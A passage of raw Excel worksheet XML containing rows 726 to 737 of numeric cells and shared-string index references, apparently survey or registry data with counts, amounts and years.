        <v>268</v>
      </c>
      <c r="AK726" t="s">
        <v>252</v>
      </c>
      <c r="AL726" t="s">
        <v>174</v>
      </c>
      <c r="AM726" t="s">
        <v>5694</v>
      </c>
      <c r="AN726" t="s">
        <v>55</v>
      </c>
      <c r="AO726">
        <v>2015</v>
      </c>
      <c r="AP726" t="s">
        <v>5695</v>
      </c>
      <c r="AQ726">
        <v>811119199</v>
      </c>
      <c r="AR726" t="s">
        <v>5696</v>
      </c>
      <c r="AS726" t="s">
        <v>187</v>
      </c>
      <c r="AT726" t="s">
        <v>72</v>
      </c>
      <c r="AU726">
        <v>25</v>
      </c>
      <c r="AV726">
        <v>1</v>
      </c>
      <c r="AW726">
        <v>0</v>
      </c>
      <c r="AX726">
        <v>0</v>
      </c>
      <c r="AY726">
        <v>5</v>
      </c>
      <c r="AZ726">
        <v>5</v>
      </c>
      <c r="BA726" t="s">
        <v>17205</v>
      </c>
      <c r="BB726" t="s">
        <v>15871</v>
      </c>
      <c r="BC726" t="s">
        <v>10031</v>
      </c>
      <c r="BD726" t="s">
        <v>9694</v>
      </c>
    </row>
    <row r="727" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A727">
        <v>2110</v>
      </c>
      <c r="B727" t="s">
        <v>5697</v>
      </c>
      <c r="C727" t="s">
        <v>458</v>
      </c>
      <c r="D727" t="s">
        <v>5698</v>
      </c>
      <c r="E727" t="s">
        <v>843</v>
      </c>
      <c r="F727" t="s">
        <v>5699</v>
      </c>
      <c r="G727" s="1">
        <v>43930</v>
      </c>
      <c r="H727">
        <v>2274</v>
      </c>
      <c r="I727">
        <v>2274</v>
      </c>
      <c r="J727">
        <v>1</v>
      </c>
      <c r="K727">
        <v>1</v>
      </c>
      <c r="L727">
        <v>1</v>
      </c>
      <c r="M727">
        <v>1</v>
      </c>
      <c r="N727">
        <v>0</v>
      </c>
      <c r="O727">
        <v>1</v>
      </c>
      <c r="P727">
        <v>1</v>
      </c>
      <c r="Q727">
        <v>1</v>
      </c>
      <c r="R727">
        <v>1</v>
      </c>
      <c r="S727">
        <v>1</v>
      </c>
      <c r="T727">
        <v>1</v>
      </c>
      <c r="U727">
        <v>0</v>
      </c>
      <c r="V727">
        <v>0</v>
      </c>
      <c r="W727">
        <v>0</v>
      </c>
      <c r="X727">
        <v>0</v>
      </c>
      <c r="Y727">
        <v>0</v>
      </c>
      <c r="Z727">
        <v>0</v>
      </c>
      <c r="AA727">
        <v>0</v>
      </c>
      <c r="AB727">
        <v>0</v>
      </c>
      <c r="AC727">
        <v>0</v>
      </c>
      <c r="AD727">
        <v>0</v>
      </c>
      <c r="AE727">
        <v>0</v>
      </c>
      <c r="AF727" t="s">
        <v>5700</v>
      </c>
      <c r="AG727">
        <v>29000</v>
      </c>
      <c r="AH727">
        <v>5</v>
      </c>
      <c r="AJ727">
        <v>154</v>
      </c>
      <c r="AK727" t="s">
        <v>3358</v>
      </c>
      <c r="AL727" t="s">
        <v>3358</v>
      </c>
      <c r="AM727" t="s">
        <v>5701</v>
      </c>
      <c r="AN727" t="s">
        <v>68</v>
      </c>
      <c r="AO727">
        <v>2010</v>
      </c>
      <c r="AP727">
        <v>85274387829</v>
      </c>
      <c r="AQ727" t="s">
        <v>5702</v>
      </c>
      <c r="AR727" t="s">
        <v>5700</v>
      </c>
      <c r="AS727" t="s">
        <v>71</v>
      </c>
      <c r="AT727" t="s">
        <v>72</v>
      </c>
      <c r="AU727">
        <v>31</v>
      </c>
      <c r="AV727">
        <v>0</v>
      </c>
      <c r="AW727">
        <v>0</v>
      </c>
      <c r="AX727">
        <v>0</v>
      </c>
      <c r="AY727">
        <v>3</v>
      </c>
      <c r="AZ727">
        <v>0</v>
      </c>
      <c r="BA727" t="s">
        <v>17069</v>
      </c>
      <c r="BB727">
        <v>0</v>
      </c>
      <c r="BC727" t="s">
        <v>10518</v>
      </c>
      <c r="BD727" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="728" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A728">
        <v>2705</v>
      </c>
      <c r="B728" t="s">
        <v>5703</v>
      </c>
      <c r="C728" t="s">
        <v>74</v>
      </c>
      <c r="D728" t="s">
        <v>5704</v>
      </c>
      <c r="E728" t="s">
        <v>623</v>
      </c>
      <c r="F728" t="s">
        <v>5705</v>
      </c>
      <c r="G728" s="1">
        <v>44076</v>
      </c>
      <c r="H728">
        <v>2309</v>
      </c>
      <c r="I728">
        <v>2309</v>
      </c>
      <c r="J728">
        <v>1</v>
      </c>
      <c r="K728">
        <v>1</v>
      </c>
      <c r="L728">
        <v>1</v>
      </c>
      <c r="M728">
        <v>0</v>
      </c>
      <c r="N728">
        <v>0</v>
      </c>
      <c r="O728">
        <v>0</v>
      </c>
      <c r="P728">
        <v>0</v>
      </c>
      <c r="Q728">
        <v>0</v>
      </c>
      <c r="R728">
        <v>0</v>
      </c>
      <c r="S728">
        <v>1</v>
      </c>
      <c r="T728">
        <v>1</v>
      </c>
      <c r="U728">
        <v>300000</v>
      </c>
      <c r="V728">
        <v>2500</v>
      </c>
      <c r="W728">
        <v>3000</v>
      </c>
      <c r="X728">
        <v>0</v>
      </c>
      <c r="Y728">
        <v>0</v>
      </c>
      <c r="Z728">
        <v>0</v>
      </c>
      <c r="AA728">
        <v>0</v>
      </c>
      <c r="AB728">
        <v>0</v>
      </c>
      <c r="AC728">
        <v>0</v>
      </c>
      <c r="AD728">
        <v>1</v>
      </c>
      <c r="AE728">
        <v>0</v>
      </c>
      <c r="AF728" t="s">
        <v>5706</v>
      </c>
      <c r="AG728">
        <v>50153</v>
      </c>
      <c r="AH728">
        <v>14</v>
      </c>
      <c r="AJ728">
        <v>220</v>
      </c>
      <c r="AK728" t="s">
        <v>812</v>
      </c>
      <c r="AL728" t="s">
        <v>813</v>
      </c>
      <c r="AM728" t="s">
        <v>5707</v>
      </c>
      <c r="AN728" t="s">
        <v>55</v>
      </c>
      <c r="AO728">
        <v>2015</v>
      </c>
      <c r="AP728" t="s">
        <v>5708</v>
      </c>
      <c r="AQ728" t="s">
        <v>5709</v>
      </c>
      <c r="AR728" t="s">
        <v>5706</v>
      </c>
      <c r="AS728" t="s">
        <v>71</v>
      </c>
      <c r="AT728" t="s">
        <v>58</v>
      </c>
      <c r="AU728">
        <v>25</v>
      </c>
      <c r="AV728">
        <v>1</v>
      </c>
      <c r="AW728">
        <v>13</v>
      </c>
      <c r="AX728">
        <v>67</v>
      </c>
      <c r="AY728">
        <v>4</v>
      </c>
      <c r="AZ728">
        <v>5</v>
      </c>
      <c r="BA728" t="s">
        <v>16636</v>
      </c>
      <c r="BB728" t="s">
        <v>15902</v>
      </c>
      <c r="BC728">
        <v>0</v>
      </c>
      <c r="BD728" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="729" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A729">
        <v>2657</v>
      </c>
      <c r="B729" t="s">
        <v>5710</v>
      </c>
      <c r="C729" t="s">
        <v>318</v>
      </c>
      <c r="D729" t="s">
        <v>5711</v>
      </c>
      <c r="E729" t="s">
        <v>142</v>
      </c>
      <c r="F729" t="s">
        <v>537</v>
      </c>
      <c r="G729" s="1">
        <v>43900</v>
      </c>
      <c r="H729">
        <v>2336</v>
      </c>
      <c r="I729">
        <v>2336</v>
      </c>
      <c r="J729">
        <v>0</v>
      </c>
      <c r="K729">
        <v>3</v>
      </c>
      <c r="L729">
        <v>3</v>
      </c>
      <c r="M729">
        <v>2</v>
      </c>
      <c r="N729">
        <v>0</v>
      </c>
      <c r="O729">
        <v>0</v>
      </c>
      <c r="P729">
        <v>0</v>
      </c>
      <c r="Q729">
        <v>0</v>
      </c>
      <c r="R729">
        <v>0</v>
      </c>
      <c r="S729">
        <v>1</v>
      </c>
      <c r="T729">
        <v>0</v>
      </c>
      <c r="U729">
        <v>0</v>
      </c>
      <c r="V729">
        <v>450000</v>
      </c>
      <c r="W729">
        <v>5200</v>
      </c>
      <c r="X729">
        <v>1800</v>
      </c>
      <c r="Y729">
        <v>0</v>
      </c>
      <c r="Z729">
        <v>0</v>
      </c>
      <c r="AA729">
        <v>0</v>
      </c>
      <c r="AB729">
        <v>0</v>
      </c>
      <c r="AC729">
        <v>0</v>
      </c>
      <c r="AD729">
        <v>1</v>
      </c>
      <c r="AE729">
        <v>0</v>
      </c>
      <c r="AF729" t="s">
        <v>5712</v>
      </c>
      <c r="AG729">
        <v>90241</v>
      </c>
      <c r="AH729">
        <v>26</v>
      </c>
      <c r="AJ729">
        <v>420</v>
      </c>
      <c r="AK729" t="s">
        <v>331</v>
      </c>
      <c r="AL729" t="s">
        <v>332</v>
      </c>
      <c r="AM729" t="s">
        <v>5713</v>
      </c>
      <c r="AN729" t="s">
        <v>82</v>
      </c>
      <c r="AO729">
        <v>2001</v>
      </c>
      <c r="AP729" t="s">
        <v>5714</v>
      </c>
      <c r="AQ729" t="s">
        <v>5715</v>
      </c>
      <c r="AR729" t="s">
        <v>5716</v>
      </c>
      <c r="AS729" t="s">
        <v>71</v>
      </c>
      <c r="AT729" t="s">
        <v>86</v>
      </c>
      <c r="AU729">
        <v>25</v>
      </c>
      <c r="AV729">
        <v>1</v>
      </c>
      <c r="AW729">
        <v>50</v>
      </c>
      <c r="AX729">
        <v>719</v>
      </c>
      <c r="AY729">
        <v>1</v>
      </c>
      <c r="AZ729">
        <v>17</v>
      </c>
      <c r="BA729" t="s">
        <v>17246</v>
      </c>
      <c r="BB729">
        <v>0</v>
      </c>
      <c r="BC729">
        <v>0</v>
      </c>
      <c r="BD729" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="730" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A730">
        <v>2701</v>
      </c>
      <c r="B730" t="s">
        <v>5717</v>
      </c>
      <c r="C730" t="s">
        <v>99</v>
      </c>
      <c r="D730" t="s">
        <v>5718</v>
      </c>
      <c r="E730" t="s">
        <v>142</v>
      </c>
      <c r="F730" t="s">
        <v>5719</v>
      </c>
      <c r="G730" s="1">
        <v>43964</v>
      </c>
      <c r="H730">
        <v>2343</v>
      </c>
      <c r="I730">
        <v>2343</v>
      </c>
      <c r="J730">
        <v>1</v>
      </c>
      <c r="K730">
        <v>0</v>
      </c>
      <c r="L730">
        <v>1</v>
      </c>
      <c r="M730">
        <v>0</v>
      </c>
      <c r="N730">
        <v>0</v>
      </c>
      <c r="O730">
        <v>0</v>
      </c>
      <c r="P730">
        <v>0</v>
      </c>
      <c r="Q730">
        <v>2</v>
      </c>
      <c r="R730">
        <v>2</v>
      </c>
      <c r="S730">
        <v>1</v>
      </c>
      <c r="T730">
        <v>0</v>
      </c>
      <c r="U730">
        <v>500000</v>
      </c>
      <c r="V730">
        <v>0</v>
      </c>
      <c r="W730">
        <v>500</v>
      </c>
      <c r="X730">
        <v>0</v>
      </c>
      <c r="Y730">
        <v>0</v>
      </c>
      <c r="Z730">
        <v>0</v>
      </c>
      <c r="AA730">
        <v>0</v>
      </c>
      <c r="AB730">
        <v>100</v>
      </c>
      <c r="AC730">
        <v>2000</v>
      </c>
      <c r="AD730">
        <v>1</v>
      </c>
      <c r="AE730">
        <v>0</v>
      </c>
      <c r="AF730" t="s">
        <v>5720</v>
      </c>
      <c r="AG730">
        <v>14450</v>
      </c>
      <c r="AH730">
        <v>12</v>
      </c>
      <c r="AJ730">
        <v>160</v>
      </c>
      <c r="AK730" t="s">
        <v>114</v>
      </c>
      <c r="AL730" t="s">
        <v>115</v>
      </c>
      <c r="AM730" t="s">
        <v>5721</v>
      </c>
      <c r="AN730" t="s">
        <v>55</v>
      </c>
      <c r="AO730">
        <v>2015</v>
      </c>
      <c r="AP730" t="s">
        <v>5722</v>
      </c>
      <c r="AQ730" t="s">
        <v>5723</v>
      </c>
      <c r="AR730" t="s">
        <v>5724</v>
      </c>
      <c r="AS730" t="s">
        <v>187</v>
      </c>
      <c r="AT730" t="s">
        <v>58</v>
      </c>
      <c r="AU730">
        <v>6</v>
      </c>
      <c r="AV730">
        <v>1</v>
      </c>
      <c r="AW730">
        <v>10</v>
      </c>
      <c r="AX730">
        <v>0</v>
      </c>
      <c r="AY730">
        <v>22</v>
      </c>
      <c r="AZ730">
        <v>11</v>
      </c>
      <c r="BA730" t="s">
        <v>16640</v>
      </c>
      <c r="BB730" t="s">
        <v>14385</v>
      </c>
      <c r="BC730" t="s">
        <v>10546</v>
      </c>
      <c r="BD730" t="s">
        <v>10547</v>
      </c>
    </row>
    <row r="731" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A731">
        <v>1758</v>
      </c>
      <c r="B731" t="s">
        <v>5725</v>
      </c>
      <c r="C731" t="s">
        <v>458</v>
      </c>
      <c r="D731" t="s">
        <v>5726</v>
      </c>
      <c r="E731" t="s">
        <v>363</v>
      </c>
      <c r="F731" t="s">
        <v>5727</v>
      </c>
      <c r="G731" s="1">
        <v>43930</v>
      </c>
      <c r="H731">
        <v>2376</v>
      </c>
      <c r="I731">
        <v>2376</v>
      </c>
      <c r="J731">
        <v>0</v>
      </c>
      <c r="K731">
        <v>1</v>
      </c>
      <c r="L731">
        <v>0</v>
      </c>
      <c r="M731">
        <v>0</v>
      </c>
      <c r="N731">
        <v>0</v>
      </c>
      <c r="O731">
        <v>0</v>
      </c>
      <c r="P731">
        <v>0</v>
      </c>
      <c r="Q731">
        <v>0</v>
      </c>
      <c r="R731">
        <v>0</v>
      </c>
      <c r="S731">
        <v>0</v>
      </c>
      <c r="T731">
        <v>0</v>
      </c>
      <c r="U731">
        <v>0</v>
      </c>
      <c r="V731">
        <v>40000</v>
      </c>
      <c r="W731">
        <v>0</v>
      </c>
      <c r="X731">
        <v>0</v>
      </c>
      <c r="Y731">
        <v>0</v>
      </c>
      <c r="Z731">
        <v>0</v>
      </c>
      <c r="AA731">
        <v>0</v>
      </c>
      <c r="AB731">
        <v>0</v>
      </c>
      <c r="AC731">
        <v>0</v>
      </c>
      <c r="AD731">
        <v>0</v>
      </c>
      <c r="AE731">
        <v>0</v>
      </c>
      <c r="AF731" t="s">
        <v>5728</v>
      </c>
      <c r="AG731">
        <v>29444</v>
      </c>
      <c r="AH731">
        <v>5</v>
      </c>
      <c r="AJ731">
        <v>153</v>
      </c>
      <c r="AK731" t="s">
        <v>2427</v>
      </c>
      <c r="AL731" t="s">
        <v>5729</v>
      </c>
      <c r="AM731" t="s">
        <v>5730</v>
      </c>
      <c r="AN731" t="s">
        <v>55</v>
      </c>
      <c r="AO731">
        <v>2012</v>
      </c>
      <c r="AP731">
        <v>81270981111</v>
      </c>
      <c r="AQ731" t="s">
        <v>5731</v>
      </c>
      <c r="AR731" t="s">
        <v>5728</v>
      </c>
      <c r="AS731" t="s">
        <v>71</v>
      </c>
      <c r="AT731" t="s">
        <v>58</v>
      </c>
      <c r="AU731">
        <v>0</v>
      </c>
      <c r="AV731">
        <v>0</v>
      </c>
      <c r="AW731">
        <v>0</v>
      </c>
      <c r="AX731">
        <v>0</v>
      </c>
      <c r="AY731">
        <v>2</v>
      </c>
      <c r="AZ731">
        <v>4</v>
      </c>
      <c r="BA731" t="s">
        <v>16862</v>
      </c>
      <c r="BB731" t="s">
        <v>15232</v>
      </c>
      <c r="BC731" t="s">
        <v>9638</v>
      </c>
      <c r="BD731" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="732" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A732">
        <v>2088</v>
      </c>
      <c r="B732" t="s">
        <v>5732</v>
      </c>
      <c r="C732" t="s">
        <v>607</v>
      </c>
      <c r="D732" t="s">
        <v>5733</v>
      </c>
      <c r="E732" t="s">
        <v>142</v>
      </c>
      <c r="F732" t="s">
        <v>5734</v>
      </c>
      <c r="G732" s="1">
        <v>44040</v>
      </c>
      <c r="H732">
        <v>2385</v>
      </c>
      <c r="I732">
        <v>2385</v>
      </c>
      <c r="J732">
        <v>0</v>
      </c>
      <c r="K732">
        <v>1</v>
      </c>
      <c r="L732">
        <v>0</v>
      </c>
      <c r="M732">
        <v>0</v>
      </c>
      <c r="N732">
        <v>0</v>
      </c>
      <c r="O732">
        <v>0</v>
      </c>
      <c r="P732">
        <v>0</v>
      </c>
      <c r="Q732">
        <v>0</v>
      </c>
      <c r="R732">
        <v>3</v>
      </c>
      <c r="S732">
        <v>0</v>
      </c>
      <c r="T732">
        <v>0</v>
      </c>
      <c r="U732">
        <v>0</v>
      </c>
      <c r="V732">
        <v>20000</v>
      </c>
      <c r="W732">
        <v>0</v>
      </c>
      <c r="X732">
        <v>0</v>
      </c>
      <c r="Y732">
        <v>0</v>
      </c>
      <c r="Z732">
        <v>0</v>
      </c>
      <c r="AA732">
        <v>0</v>
      </c>
      <c r="AB732">
        <v>0</v>
      </c>
      <c r="AC732">
        <v>5000</v>
      </c>
      <c r="AD732">
        <v>0</v>
      </c>
      <c r="AE732">
        <v>0</v>
      </c>
      <c r="AF732" t="s">
        <v>5735</v>
      </c>
      <c r="AG732">
        <v>77482</v>
      </c>
      <c r="AH732">
        <v>24</v>
      </c>
      <c r="AJ732">
        <v>369</v>
      </c>
      <c r="AK732" t="s">
        <v>5736</v>
      </c>
      <c r="AL732" t="s">
        <v>5737</v>
      </c>
      <c r="AM732" t="s">
        <v>5738</v>
      </c>
      <c r="AN732" t="s">
        <v>288</v>
      </c>
      <c r="AO732">
        <v>2019</v>
      </c>
      <c r="AP732">
        <v>81381548156</v>
      </c>
      <c r="AQ732">
        <v>81381548156</v>
      </c>
      <c r="AR732" t="s">
        <v>5739</v>
      </c>
      <c r="AU732">
        <v>26</v>
      </c>
      <c r="AV732">
        <v>0</v>
      </c>
      <c r="AW732">
        <v>5</v>
      </c>
      <c r="AX732">
        <v>0</v>
      </c>
      <c r="AY732">
        <v>1</v>
      </c>
      <c r="AZ732">
        <v>0</v>
      </c>
      <c r="BA732" t="s">
        <v>17062</v>
      </c>
      <c r="BB732" t="s">
        <v>15693</v>
      </c>
      <c r="BC732" t="s">
        <v>10700</v>
      </c>
      <c r="BD732">
        <v>0</v>
      </c>
    </row>
    <row r="733" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A733">
        <v>2677</v>
      </c>
      <c r="B733" t="s">
        <v>5740</v>
      </c>
      <c r="C733" t="s">
        <v>3692</v>
      </c>
      <c r="D733" t="s">
        <v>5741</v>
      </c>
      <c r="E733" t="s">
        <v>142</v>
      </c>
      <c r="F733" t="s">
        <v>143</v>
      </c>
      <c r="G733" s="1">
        <v>44155</v>
      </c>
      <c r="H733">
        <v>2398</v>
      </c>
      <c r="I733">
        <v>2398</v>
      </c>
      <c r="J733">
        <v>0</v>
      </c>
      <c r="K733">
        <v>0</v>
      </c>
      <c r="L733">
        <v>1</v>
      </c>
      <c r="M733">
        <v>0</v>
      </c>
      <c r="N733">
        <v>0</v>
      </c>
      <c r="O733">
        <v>0</v>
      </c>
      <c r="P733">
        <v>0</v>
      </c>
      <c r="Q733">
        <v>2</v>
      </c>
      <c r="R733">
        <v>1</v>
      </c>
      <c r="S733">
        <v>0</v>
      </c>
      <c r="T733">
        <v>0</v>
      </c>
      <c r="U733">
        <v>0</v>
      </c>
      <c r="V733">
        <v>0</v>
      </c>
      <c r="W733">
        <v>50</v>
      </c>
      <c r="X733">
        <v>0</v>
      </c>
      <c r="Y733">
        <v>0</v>
      </c>
      <c r="Z733">
        <v>0</v>
      </c>
      <c r="AA733">
        <v>0</v>
      </c>
      <c r="AB733">
        <v>50</v>
      </c>
      <c r="AC733">
        <v>100</v>
      </c>
      <c r="AD733">
        <v>0</v>
      </c>
      <c r="AE733">
        <v>0</v>
      </c>
      <c r="AF733" t="s">
        <v>5742</v>
      </c>
      <c r="AG733">
        <v>26225</v>
      </c>
      <c r="AH733">
        <v>3</v>
      </c>
      <c r="AJ733">
        <v>74</v>
      </c>
      <c r="AK733" t="s">
        <v>5743</v>
      </c>
      <c r="AL733" t="s">
        <v>5744</v>
      </c>
      <c r="AM733" t="s">
        <v>5745</v>
      </c>
      <c r="AN733" t="s">
        <v>68</v>
      </c>
      <c r="AO733">
        <v>2014</v>
      </c>
      <c r="AP733">
        <v>8116696007</v>
      </c>
      <c r="AQ733" t="s">
        <v>5746</v>
      </c>
      <c r="AR733" t="s">
        <v>5747</v>
      </c>
      <c r="AS733" t="s">
        <v>71</v>
      </c>
      <c r="AT733" t="s">
        <v>72</v>
      </c>
      <c r="AU733">
        <v>26</v>
      </c>
      <c r="AV733">
        <v>1</v>
      </c>
      <c r="AW733">
        <v>1</v>
      </c>
      <c r="AX733">
        <v>0</v>
      </c>
      <c r="AY733">
        <v>8</v>
      </c>
      <c r="AZ733">
        <v>4</v>
      </c>
      <c r="BA733">
        <v>0</v>
      </c>
      <c r="BB733">
        <v>0</v>
      </c>
      <c r="BC733" t="s">
        <v>10553</v>
      </c>
      <c r="BD733">
        <v>0</v>
      </c>
    </row>
    <row r="734" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A734">
        <v>2656</v>
      </c>
      <c r="B734" t="s">
        <v>5748</v>
      </c>
      <c r="C734" t="s">
        <v>168</v>
      </c>
      <c r="D734" t="s">
        <v>5749</v>
      </c>
      <c r="E734" t="s">
        <v>274</v>
      </c>
      <c r="F734" t="s">
        <v>143</v>
      </c>
      <c r="G734" s="1">
        <v>44155</v>
      </c>
      <c r="H734">
        <v>2408</v>
      </c>
      <c r="I734">
        <v>2408</v>
      </c>
      <c r="J734">
        <v>1</v>
      </c>
      <c r="K734">
        <v>0</v>
      </c>
      <c r="L734">
        <v>2</v>
      </c>
      <c r="M734">
        <v>0</v>
      </c>
      <c r="N734">
        <v>0</v>
      </c>
      <c r="O734">
        <v>0</v>
      </c>
      <c r="P734">
        <v>0</v>
      </c>
      <c r="Q734">
        <v>0</v>
      </c>
      <c r="R734">
        <v>0</v>
      </c>
      <c r="S734">
        <v>0</v>
      </c>
      <c r="T734">
        <v>2</v>
      </c>
      <c r="U734">
        <v>30000</v>
      </c>
      <c r="V734">
        <v>0</v>
      </c>
      <c r="W734">
        <v>1500</v>
      </c>
      <c r="X734">
        <v>0</v>
      </c>
      <c r="Y734">
        <v>0</v>
      </c>
      <c r="Z734">
        <v>0</v>
      </c>
      <c r="AA734">
        <v>0</v>
      </c>
      <c r="AB734">
        <v>0</v>
      </c>
      <c r="AC734">
        <v>0</v>
      </c>
      <c r="AD734">
        <v>0</v>
      </c>
      <c r="AE734">
        <v>1000</v>
      </c>
      <c r="AF734" t="s">
        <v>5750</v>
      </c>
      <c r="AG734">
        <v>43196</v>
      </c>
      <c r="AH734">
        <v>13</v>
      </c>
      <c r="AJ734">
        <v>162</v>
      </c>
      <c r="AK734" t="s">
        <v>5751</v>
      </c>
      <c r="AL734" t="s">
        <v>5752</v>
      </c>
      <c r="AM734" t="s">
        <v>5753</v>
      </c>
      <c r="AN734" t="s">
        <v>68</v>
      </c>
      <c r="AO734">
        <v>2009</v>
      </c>
      <c r="AP734" t="s">
        <v>5754</v>
      </c>
      <c r="AQ734" t="s">
        <v>5755</v>
      </c>
      <c r="AR734" t="s">
        <v>5756</v>
      </c>
      <c r="AS734" t="s">
        <v>71</v>
      </c>
      <c r="AT734" t="s">
        <v>72</v>
      </c>
      <c r="AU734">
        <v>26</v>
      </c>
      <c r="AV734">
        <v>1</v>
      </c>
      <c r="AW734">
        <v>23</v>
      </c>
      <c r="AX734">
        <v>39</v>
      </c>
      <c r="AY734">
        <v>3</v>
      </c>
      <c r="AZ734">
        <v>6</v>
      </c>
      <c r="BA734" t="s">
        <v>17245</v>
      </c>
      <c r="BB734">
        <v>0</v>
      </c>
      <c r="BC734" t="s">
        <v>10719</v>
      </c>
      <c r="BD734">
        <v>0</v>
      </c>
    </row>
    <row r="735" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A735">
        <v>2667</v>
      </c>
      <c r="B735" t="s">
        <v>3535</v>
      </c>
      <c r="C735" t="s">
        <v>157</v>
      </c>
      <c r="D735" t="s">
        <v>5757</v>
      </c>
      <c r="E735" t="s">
        <v>142</v>
      </c>
      <c r="F735" t="s">
        <v>562</v>
      </c>
      <c r="G735" s="1">
        <v>43963</v>
      </c>
      <c r="H735">
        <v>2427</v>
      </c>
      <c r="I735">
        <v>2427</v>
      </c>
      <c r="J735">
        <v>4</v>
      </c>
      <c r="K735">
        <v>0</v>
      </c>
      <c r="L735">
        <v>0</v>
      </c>
      <c r="M735">
        <v>3</v>
      </c>
      <c r="N735">
        <v>0</v>
      </c>
      <c r="O735">
        <v>0</v>
      </c>
      <c r="P735">
        <v>0</v>
      </c>
      <c r="Q735">
        <v>0</v>
      </c>
      <c r="R735">
        <v>0</v>
      </c>
      <c r="S735">
        <v>0</v>
      </c>
      <c r="T735">
        <v>0</v>
      </c>
      <c r="U735">
        <v>600000</v>
      </c>
      <c r="V735">
        <v>0</v>
      </c>
      <c r="W735">
        <v>0</v>
      </c>
      <c r="X735">
        <v>750</v>
      </c>
      <c r="Y735">
        <v>0</v>
      </c>
      <c r="Z735">
        <v>0</v>
      </c>
      <c r="AA735">
        <v>0</v>
      </c>
      <c r="AB735">
        <v>0</v>
      </c>
      <c r="AC735">
        <v>0</v>
      </c>
      <c r="AD735">
        <v>0</v>
      </c>
      <c r="AE735">
        <v>0</v>
      </c>
      <c r="AF735" t="s">
        <v>5758</v>
      </c>
      <c r="AG735">
        <v>68421</v>
      </c>
      <c r="AH735">
        <v>16</v>
      </c>
      <c r="AJ735">
        <v>237</v>
      </c>
      <c r="AK735" t="s">
        <v>311</v>
      </c>
      <c r="AL735" t="s">
        <v>1066</v>
      </c>
      <c r="AM735" t="s">
        <v>5759</v>
      </c>
      <c r="AN735" t="s">
        <v>82</v>
      </c>
      <c r="AO735">
        <v>2009</v>
      </c>
      <c r="AP735" t="s">
        <v>5760</v>
      </c>
      <c r="AQ735" t="s">
        <v>5761</v>
      </c>
      <c r="AR735" t="s">
        <v>5762</v>
      </c>
      <c r="AS735" t="s">
        <v>71</v>
      </c>
      <c r="AT735" t="s">
        <v>86</v>
      </c>
      <c r="AU735">
        <v>25</v>
      </c>
      <c r="AV735">
        <v>3</v>
      </c>
      <c r="AW735">
        <v>10</v>
      </c>
      <c r="AX735">
        <v>202</v>
      </c>
      <c r="AY735">
        <v>26</v>
      </c>
      <c r="AZ735">
        <v>33</v>
      </c>
      <c r="BA735" t="s">
        <v>16608</v>
      </c>
      <c r="BB735" t="s">
        <v>15905</v>
      </c>
      <c r="BC735">
        <v>0</v>
      </c>
      <c r="BD735" t="s">
        <v>9712</v>
      </c>
    </row>
    <row r="736" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A736">
        <v>2547</v>
      </c>
      <c r="B736" t="s">
        <v>5763</v>
      </c>
      <c r="C736" t="s">
        <v>74</v>
      </c>
      <c r="D736" t="s">
        <v>5764</v>
      </c>
      <c r="E736" t="s">
        <v>49</v>
      </c>
      <c r="F736" t="s">
        <v>4037</v>
      </c>
      <c r="G736" s="1">
        <v>43979</v>
      </c>
      <c r="H736">
        <v>2433</v>
      </c>
      <c r="I736">
        <v>2433</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t="s">
        <v>5765</v>
      </c>
      <c r="AG736">
        <v>50219</v>
      </c>
      <c r="AH736">
        <v>14</v>
      </c>
      <c r="AJ736">
        <v>220</v>
      </c>
      <c r="AK736" t="s">
        <v>1441</v>
      </c>
      <c r="AL736" t="s">
        <v>1442</v>
      </c>
      <c r="AM736" t="s">
        <v>5766</v>
      </c>
      <c r="AN736" t="s">
        <v>55</v>
      </c>
      <c r="AO736">
        <v>2017</v>
      </c>
      <c r="AP736">
        <v>2476672838</v>
      </c>
      <c r="AQ736" t="s">
        <v>5767</v>
      </c>
      <c r="AR736" t="s">
        <v>5765</v>
      </c>
      <c r="AS736" t="s">
        <v>71</v>
      </c>
      <c r="AT736" t="s">
        <v>58</v>
      </c>
      <c r="AU736">
        <v>6</v>
      </c>
      <c r="AV736">
        <v>1</v>
      </c>
      <c r="AW736">
        <v>45</v>
      </c>
      <c r="AX736">
        <v>53</v>
      </c>
      <c r="AY736">
        <v>22</v>
      </c>
      <c r="AZ736">
        <v>14</v>
      </c>
      <c r="BA736" t="s">
        <v>17172</v>
      </c>
      <c r="BB736" t="s">
        <v>17262</v>
      </c>
      <c r="BC736">
        <v>0</v>
      </c>
      <c r="BD736" t="s">
        <v>11043</v>
      </c>
    </row>
    <row r="737" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A737">
        <v>2609</v>
      </c>
      <c r="B737" t="s">
        <v>5768</v>
      </c>
      <c r="C737" t="s">
        <v>157</v>
      </c>
      <c r="D737" t="s">
        <v>5769</v>
      </c>
      <c r="E737" t="s">
        <v>1597</v>
      </c>
      <c r="F737" t="s">
        <v>5770</v>
      </c>
      <c r="G737" s="1">
        <v>44090</v>
      </c>
      <c r="H737">
        <v>2444</v>
      </c>
      <c r="I737">
        <v>2444</v>
      </c>
      <c r="J737">
        <v>1</v>
      </c>
      <c r="K737">
        <v>3</v>
      </c>
      <c r="L737">
        <v>2</v>
      </c>
      <c r="M737">
        <v>0</v>
      </c>
      <c r="N737">
        <v>0</v>
      </c>
      <c r="O737">
        <v>0</v>
      </c>
      <c r="P737">
        <v>0</v>
      </c>
      <c r="Q737">
        <v>0</v>
      </c>
      <c r="R737">
        <v>0</v>
      </c>
      <c r="S737">
        <v>0</v>
      </c>
      <c r="T737">
        <v>0</v>
      </c>
      <c r="U737">
        <v>5000</v>
      </c>
      <c r="V737">
        <v>500</v>
      </c>
      <c r="W737">
        <v>100</v>
      </c>
      <c r="X737">
        <v>0</v>
      </c>
      <c r="Y737">
        <v>0</v>
      </c>
      <c r="Z737">
        <v>0</v>
      </c>
      <c r="AA737">
        <v>0</v>
      </c>
      <c r="AB737">
        <v>0</v>
      </c>
      <c r="AC737">
        <v>0</v>
      </c>
